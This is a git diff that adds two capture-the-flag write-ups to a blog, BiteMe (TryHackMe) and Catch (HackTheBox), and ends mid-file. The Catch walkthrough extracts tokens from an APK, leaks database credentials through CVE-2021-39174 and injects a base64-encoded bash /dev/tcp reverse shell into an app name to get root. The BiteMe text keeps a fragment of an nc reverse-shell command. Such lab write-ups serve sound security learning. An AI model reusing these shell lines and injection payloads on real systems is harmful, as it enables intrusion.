@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:54864448847abe460f53160ac41dd875500812a748e9569cae3150cf03144e21 +size 35817 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-1.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-1.webp new file mode 100644 index 0000000..2b1eb29 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:45979071648c84705bbe3ed9a8f822932d8669fd03bf101f5abc79bf081ec665 +size 34824 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-10.png b/content/writeup-ctf/writeup-biteme-thm/img/image-10.png new file mode 100644 index 0000000..381b22f --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:06be53934f4e7b6b1152fee7361efa109f3cadf9df42709ec2ddb7a83bb5b591 +size 19825 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-10.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-10.webp new file mode 100644 index 0000000..e324ad3 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a7463093f9159c6feb32fbbc69cb5dd639d5705de0f4bfff3da6475b21d3f75 +size 20918 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-11.png b/content/writeup-ctf/writeup-biteme-thm/img/image-11.png new file mode 100644 index 0000000..1b02aa6 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:539530f18c28b6476806958a5a3c0ff749d75943aa552d09b022977d4a80ac6d +size 18565 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-11.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-11.webp new file mode 100644 index 0000000..f4f8667 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-11.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:319a6d68946a7095a605fb1b396d11f62beef5383450ec5446c3e0c004f7c455 +size 19178 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-2.png b/content/writeup-ctf/writeup-biteme-thm/img/image-2.png new file mode 100644 index 0000000..6cca661 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:499c2f62dcc4bd5e81a54dc83bfc0c7a9746e979b13f429c562dd2fa95597843 +size 57323 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-2.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-2.webp new file mode 100644 index 0000000..b59b296 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:db55ee05553c2b0acb189b441740044f85cc2e91d54024bed41eb299be1ff75f +size 52796 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-3.png b/content/writeup-ctf/writeup-biteme-thm/img/image-3.png new file mode 100644 index 0000000..d12d014 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:932755c76882e0b1bc8018a285eb5b556f5cb32962e0ff01584bc2f6bdc80656 +size 86905 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-3.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-3.webp new file mode 100644 index 0000000..55f1949 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e44dbf53b640f388b57bd121b2dca9a53f272ed3e46e72a3d34ca8223bfdaa61 +size 79924 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-4.png b/content/writeup-ctf/writeup-biteme-thm/img/image-4.png new file mode 100644 index 0000000..8ac800d --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-4.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:96f2bc47cbd1a694e5d04a6d3e404fb218b3e04653eaf33db41d4d312fb32194 +size 18126 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-4.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-4.webp new file mode 100644 index 0000000..bcd9de8 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:272608ed24040959430b54b0a35d7f92dcb2218bf1d4d3cdb5bddf25b2f48aa5 +size 11342 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-5.png b/content/writeup-ctf/writeup-biteme-thm/img/image-5.png new file mode 100644 index 0000000..12da642 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:526bd90316ce72f1f46b178f07043b4dfd1d90fc09b1210e4d853a56fdddf895 +size 5544 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-5.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-5.webp new file mode 100644 index 0000000..71f7b9d --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f51b45d70d966496681460dcc5602cb92e8e40587f97b23c37214670fb3ea26 +size 4120 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-6.png b/content/writeup-ctf/writeup-biteme-thm/img/image-6.png new file mode 100644 index 0000000..8db9f4e --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7abdcafef6d1624b614efbdf87289be606003843fce2762a777bbaaaf0bede12 +size 6770 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-6.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-6.webp new file mode 100644 index 0000000..52c118b --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-6.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:57e91669dfd6dc38e2d9182b2a8c1b2a7b34283e2f36c56d5d3909f35bdee7cb +size 11588 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-7.png b/content/writeup-ctf/writeup-biteme-thm/img/image-7.png new file mode 100644 index 0000000..0d44a2e --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:82501103aecf2c78124a796e52618fcbe8ad8c6d384ac79f2f918086fa4b0e8e +size 149970 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-7.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-7.webp new file mode 100644 index 0000000..3811fec --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3bb0f26f55c6528eeb0820d417d1f6a04835cc325fd778a2841a5fcab16f56e8 +size 146672 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-8.png b/content/writeup-ctf/writeup-biteme-thm/img/image-8.png new file mode 100644 index 0000000..7bd2020 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e977062c7558272d997318abcfb64fc39f1111b7769dff2171431bc0003ed0e2 +size 42326 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-8.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-8.webp new file mode 100644 index 0000000..a3217b9 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:926b5456fb4ed233bbb5bd4bae8d2f3b1fe763a4603604b02fe9ca66d6e107ca +size 37152 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-9.png b/content/writeup-ctf/writeup-biteme-thm/img/image-9.png new file mode 100644 index 0000000..30ecba1 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-9.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:381126ccacb78010cd9907666475fc82797f0c12510b6728249cc5e80a906a26 +size 16143 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-9.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-9.webp new file mode 100644 index 0000000..f0b7b78 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3496bcb1d4d6e45e7f461aff86cd3657bb5de894d3d9da45b33a5832b9d5e90e +size 18106 diff --git a/content/writeup-ctf/writeup-biteme-thm/index.md b/content/writeup-ctf/writeup-biteme-thm/index.md new file mode 100644 index 0000000..6d4710e --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/index.md 
@@ -0,0 +1,149 @@ +--- +title: "Writeup - BiteMe (THM)" +date: 2022-03-21 +slug: "writeup-biteme-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Biteme](https://tryhackme.com/room/biteme) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.31.162 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.6p1) +- 80/tcp : HTTP web server (Apache 2.4.29) + +## Exploit + +First of all I start with a scan of the website pages. + +![](img/image-2.webp) + +Nothing special, let's try to do the same scan but with a focus on ".php" pages. + +![](img/image-3.webp) + +Ok, now there are a number of pages, including the "dashboard.php" page which gives us access to a login form. + +![](img/image-4.webp) + +The page "config.php" which gives us information about a connection identifier. + + +```bash + &1|nc 10.18.67.218 1234 >/tmp/f +``` +I then run the following command to restart fail2ban: + + +```bash +sudo systemctl restart fail2ban +``` +I now have a root shell and I can get the last flag! + +![](img/image-11.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not allow access to .phps pages +- Use a real password verification function +- Implement an anti-brute force function for the MFA page +- Don't let sudo be used without a password diff --git a/content/writeup-ctf/writeup-catch-htb/featured.png b/content/writeup-ctf/writeup-catch-htb/featured.png new file mode 100644 index 0000000..352f305 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:668b4799997b7b15925b22c6f90caef4dd9a3751f1affc2818a248af11124dce +size 280600 
diff --git a/content/writeup-ctf/writeup-catch-htb/featured.webp b/content/writeup-ctf/writeup-catch-htb/featured.webp new file mode 100644 index 0000000..7b4ba2f --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b528a1a5a6d048d10c75127fa07ace3a6f68cff51200dd7ea899519e32b0c1d3 +size 29616 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-1.png b/content/writeup-ctf/writeup-catch-htb/img/image-1.png new file mode 100644 index 0000000..2b98e63 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6aa240d6b3c7725b181cf04cdc3a63904031a33dab717c3f0dadd83cdc9d1e6 +size 37756 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-1.webp b/content/writeup-ctf/writeup-catch-htb/img/image-1.webp new file mode 100644 index 0000000..1143951 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:265befeb32aaef59b25030707307b41895a96465703bc59c340a2a51fd3292cb +size 25552 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-2.png b/content/writeup-ctf/writeup-catch-htb/img/image-2.png new file mode 100644 index 0000000..3c84cf1 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f24387998a7dae717a0007afff006b4c1096577533bf6238ed8d4dd7c0ce430 +size 184173 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-2.webp b/content/writeup-ctf/writeup-catch-htb/img/image-2.webp new file mode 100644 index 0000000..53c8600 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:37ef389fbbc27ee1d3f89ba9f0d74b32c0c5d6e4b345ab016999cc86133c6f86 +size 51572 
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-3.png b/content/writeup-ctf/writeup-catch-htb/img/image-3.png new file mode 100644 index 0000000..a212e6f --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aa141d6db2a20161288bc144939be9db4677f34c00092da99dc8a2982589afab +size 70981 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-3.webp b/content/writeup-ctf/writeup-catch-htb/img/image-3.webp new file mode 100644 index 0000000..332ee2e --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64214aeff159d78e04417ddedc81cb4f806a210625dc96185ab90e95d68854b3 +size 46066 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-4.png b/content/writeup-ctf/writeup-catch-htb/img/image-4.png new file mode 100644 index 0000000..0239894 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9474c2361eeac9f48e504e21d4e01878155ce6b7bb26cc53f2224f90fa21710a +size 46023 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-4.webp b/content/writeup-ctf/writeup-catch-htb/img/image-4.webp new file mode 100644 index 0000000..e25229a --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a548359ed65b9527d24bb8c428e62cbc8154f91b6f8cb8651d1fba84dd7b704 +size 19124 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-5.png b/content/writeup-ctf/writeup-catch-htb/img/image-5.png new file mode 100644 index 0000000..17428f2 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:042fbb1fb99e98c40a24e6a9772d255e982a5a37e7bbffa3d2fd325f68fa1348 +size 18024 
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-5.webp b/content/writeup-ctf/writeup-catch-htb/img/image-5.webp new file mode 100644 index 0000000..1de6fe1 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:712dc68b4094517c892df5e8b10756469b2d3021f213964be581ae7117e2afc8 +size 9138 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-6.png b/content/writeup-ctf/writeup-catch-htb/img/image-6.png new file mode 100644 index 0000000..434751a --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ba90e475b421c8f3f7a1d6ddb27de9dd91279e43a04fd3669211f05c525881d +size 80294 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-6.webp b/content/writeup-ctf/writeup-catch-htb/img/image-6.webp new file mode 100644 index 0000000..78c012d --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:68213d0ac71604e50d245441f1fa6f2eaa7786b165b11bb6045b7a33be1e57c7 +size 99478 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-7.png b/content/writeup-ctf/writeup-catch-htb/img/image-7.png new file mode 100644 index 0000000..533a57c --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6633b17aaaf81b93539aa83f82b84524eaaeaa300df7f9d512c74685659d96d2 +size 11626 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-7.webp b/content/writeup-ctf/writeup-catch-htb/img/image-7.webp new file mode 100644 index 0000000..5da76bf --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4a9e2b4c9f04b12b767c07d30909bbf5c776a2cb7996048de529e1df89329f7a +size 11838 
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-8.png b/content/writeup-ctf/writeup-catch-htb/img/image-8.png new file mode 100644 index 0000000..821708c --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8af22711ae5ba67ac14de66f4cc2e79aeeadfca3a77e4708e8b7de0b7f764b6 +size 17196 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-8.webp b/content/writeup-ctf/writeup-catch-htb/img/image-8.webp new file mode 100644 index 0000000..8acc1d8 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:65ec1675b299969559bd757b82abb525e6c3f635da324e337c7e43cf05d54607 +size 22672 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-9.png b/content/writeup-ctf/writeup-catch-htb/img/image-9.png new file mode 100644 index 0000000..996c43e --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4a361bcc70158e4180a45edc9de791ce2444168f4cbe206977b5eb9a92999c60 +size 17739 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-9.webp b/content/writeup-ctf/writeup-catch-htb/img/image-9.webp new file mode 100644 index 0000000..5ad7bff --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3780ee70dc721214fdd3c96714174a23aec74bbc0fc668a275769177d3c0021a +size 18002 diff --git a/content/writeup-ctf/writeup-catch-htb/index.md b/content/writeup-ctf/writeup-catch-htb/index.md new file mode 100644 index 0000000..6ef53c0 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/index.md 
@@ -0,0 +1,251 @@ +--- +title: "Writeup - Catch (HTB)" +date: 2022-04-30 +slug: "writeup-catch-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Catch](https://app.hackthebox.com/machines/Catch) machine on the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -sC -O -T4 -n -Pn -oA fastscan 10.129.180.130 +``` +Five TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : HTTP web server (Apache 2.4.41) +- 3000 : Gitea 1.14.1 +- 5000 : let's Chat +- 8000 : Cachet (Apache 2.4.41) + +![](img/image-2.webp) + +## Exploit + +At first I start by scanning the files of the site. + +![](img/image-3.webp) + +Nothing particular, by going on the site, there is the possibility of downloading an application: `catchv1.0.apk`. So I download it, then I unpack it with the following command: + + +```bash +apktool d catchv1.0.apk +``` +Then I look for passwords, tokens, ... + + +```bash +┌──(d3vyce㉿kali)-[~/catchv1.0] +└─$ find ./ -type f -exec grep -H 'token' {} \; +./res/values/strings.xml: b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0 +./res/values/strings.xml: NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ== +./res/values/strings.xml: xoxp-23984754863-2348975623103 +[...] +``` +We find 2 tokens, one is for gitea and the other is for lets chat. I choose to start with the second one. At first I generate a request with the help of Burp. Then after some research I find on this [site](https://stackoverflow.com/questions/37302448/lets-chat-authentication-via-ajax-request) that to add a token to the request it is necessary to use `Authorisation: bearer [TOKEN]`. 
Now that I have the authorization, I start by listing the different rooms: + + +```bash +GET /rooms HTTP/1.1 +Host: catch.htb:5000 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Authorisation: bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ +Cookie: connect.sid=s%3APQgPB6T9iE4OkwoXsVLWBTYYv__899Ny.v%2BdKrRNFbDrEQkPjm0kAoxdQfi6%2BsTB0AmPQ1q%2BnKns +If-None-Match: W/"35c-aAImKzSV1mWHmtGLu5/YkMt+2hk" +Connection: close +``` + +```bash +HTTP/1.1 200 OK +X-Frame-Options: SAMEORIGIN +X-Download-Options: noopen +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +Content-Security-Policy: +X-UA-Compatible: IE=Edge,chrome=1 +Content-Type: application/json; charset=utf-8 +ETag: W/"35c-aAImKzSV1mWHmtGLu5/YkMt+2hk" +Vary: Accept-Encoding +Date: Fri, 22 Apr 2022 10:31:05 GMT +Connection: close +Content-Length: 860 + +[{"id":"61b86b28d984e2451036eb17","slug":"status","name":"Status","description":"Cachet Updates and Maintenance","lastActive":"2021-12-14T10:34:20.749Z","created":"2021-12-14T10:00:08.384Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]}, +{"id":"61b8708efe190b466d476bfb","slug":"android_dev","name":"Android Development","description":"Android App Updates, Issues & More","lastActive":"2021-12-14T10:24:21.145Z","created":"2021-12-14T10:23:10.474Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]}, +{"id":"61b86b3fd984e2451036eb18","slug":"employees","name":"Employees","description":"New Joinees, Org 
updates","lastActive":"2021-12-14T10:18:04.710Z","created":"2021-12-14T10:00:31.043Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]}] +``` +I find in the result 3 rooms. I try now to list the messages included in the first room. For that I use the following query: + + +```bash +GET /rooms/61b86b28d984e2451036eb17/messages HTTP/1.1 +``` +I find several messages including this one: + + +```bash +[...] +"id":"61b8702dfe190b466d476bfa","text":"Here are the credentials `john : E}V!mywu_69T4C}W`", +"posted":"2021-12-14T10:21:33.859Z", +"owner":"61b86f15fe190b466d476bf5", +"room":"61b86b28d984e2451036eb17" +[...] +``` +A password and a login! I try to use it on the site hosted on port 8000 : + +![](img/image-4.webp) + +I find that the panel is version 2.4.0 of Cachet. After some research I find the CVE-2021-39174 which allows to obtain the contents of the variable `DB_username` and `DB_password`. For that I go in the notification parameters I set `Mail Driver` to SMTP. Then I fill `Mail From Address` with the following content: `${DB_username}`. I save and I refresh the page. + +I repeat the same procedure for the password. + +![](img/image-5.webp) + +Finally I find the following credentials: `will / s2#4Fg0_%3!` + +I now have SSH access with the user will and I can get the first flag. + +![](img/image-6.webp) + +## Privilege escalation + +I start by running the [linpeas.sh](https://linpeas.sh) script to get an overview of the machine. I quickly find a script belonging to root but that I can read. + +![](img/image-7.webp) + + +```bash +#!/bin/bash + +################### +# Signature Check # +################### + +sig_check() { + jarsigner -verify "$1/$2" 2>/dev/null >/dev/null + if [[ $? -eq 0 ]]; then + echo '[+] Signature Check Passed' + else + echo '[!] Signature Check Failed. Invalid Certificate.' 
+ cleanup + exit + fi +} + +####################### +# Compatibility Check # +####################### + +comp_check() { + apktool d -s "$1/$2" -o $3 2>/dev/null >/dev/null + COMPILE_SDK_VER=$(grep -oPm1 "(?<=compileSdkVersion=\")[^\"]+" "$PROCESS_BIN/AndroidManifest.xml") + if [ -z "$COMPILE_SDK_VER" ]; then + echo '[!] Failed to find target SDK version.' + cleanup + exit + else + if [ $COMPILE_SDK_VER -lt 18 ]; then + echo "[!] APK Doesn't meet the requirements" + cleanup + exit + fi + fi +} + +#################### +# Basic App Checks # +#################### + +app_check() { + APP_NAME=$(grep -oPm1 "(?<=)[^<]+" "$1/res/values/strings.xml") + echo $APP_NAME + if [[ $APP_NAME == *"Catch"* ]]; then + echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}' + mv "$3/$APK_NAME" "$2/$APP_NAME/$4" + else + echo "[!] App doesn't belong to Catch Global" + cleanup + exit + fi +} + + +########### +# Cleanup # +########### + +cleanup() { + rm -rf $PROCESS_BIN;rm -rf "$DROPBOX/*" "$IN_FOLDER/*";rm -rf $(ls -A /opt/mdm | grep -v apk_bin | grep -v verify.sh) +} + + +################### +# MDM CheckerV1.0 # +################### + +DROPBOX=/opt/mdm/apk_bin +IN_FOLDER=/root/mdm/apk_bin +OUT_FOLDER=/root/mdm/certified_apps +PROCESS_BIN=/root/mdm/process_bin + +for IN_APK_NAME in $DROPBOX/*.apk;do + OUT_APK_NAME="$(echo ${IN_APK_NAME##*/} | cut -d '.' -f1)_verified.apk" + APK_NAME="$(openssl rand -hex 12).apk" + if [[ -L "$IN_APK_NAME" ]]; then + exit + else + mv "$IN_APK_NAME" "$IN_FOLDER/$APK_NAME" + fi + sig_check $IN_FOLDER $APK_NAME + comp_check $IN_FOLDER $APK_NAME $PROCESS_BIN + app_check $PROCESS_BIN $OUT_FOLDER $IN_FOLDER $OUT_APK_NAME +done +cleanup +``` +In this script one part is particularly interesting: + + +```bash +if [[ $APP_NAME == *"Catch"* ]]; then + echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}' + mv "$3/$APK_NAME" "$2/$APP_NAME/$4" +``` +The script checks that the word `Catch` is present in the `app_name` variable of the apk file. 
But what is interesting is that we can put what we want before or after. I go back to the application folder that I had decompiled before. Then in the file `res/values/strings.xml` I modify the value of `app_name`. + + +```bash +[...] +Catch|echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvMTIzNCAwPiYxCg== | base64 -d | bash -i +[...] +``` +After adding a reverse shell, I recompile the application with the following command: + +![](img/image-8.webp) + +{{< alert >}} +You need apktool [v2.6.1](https://github.com/iBotPeaches/Apktool/releases/tag/v2.6.1) to do this !I now run the verification script. Then I get a reverse shell as root and I can get the last flag. +{{< /alert >}} + +![](img/image-9.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave tokens with access to sensitive content in an application available to all +- Update Cache to avoid CVE-2021-39174 exploit +- Do not use the same password for the database and a machine user +- Use a stricter check for the `app_name` variable diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/featured.png b/content/writeup-ctf/writeup-dc-9-vulnhub/featured.png new file mode 100644 index 0000000..07b664d --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4473de58c71b203dff425ff1fad94f43dbab3fa64528cc299ede1e598e02015c +size 182952 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/featured.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/featured.webp new file mode 100644 index 0000000..f73454e --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:17de1ad735251e7c04e4e6a87b01edabf48fe9023a9e335b6600891fc61fabf5 +size 122958 
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.png new file mode 100644 index 0000000..e78617a --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:90604d9657fd977333b5a3d020330a488080328a35e334dac5697956c9f4c719 +size 29831 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.webp new file mode 100644 index 0000000..408b07f --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ace903c84e4efada9d8b008e053d95e73dd750b219c88064e0e4756fdc4b6d8 +size 25490 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.png new file mode 100644 index 0000000..d86f82b --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.png @@ -0,0 +1,3 @@ +version 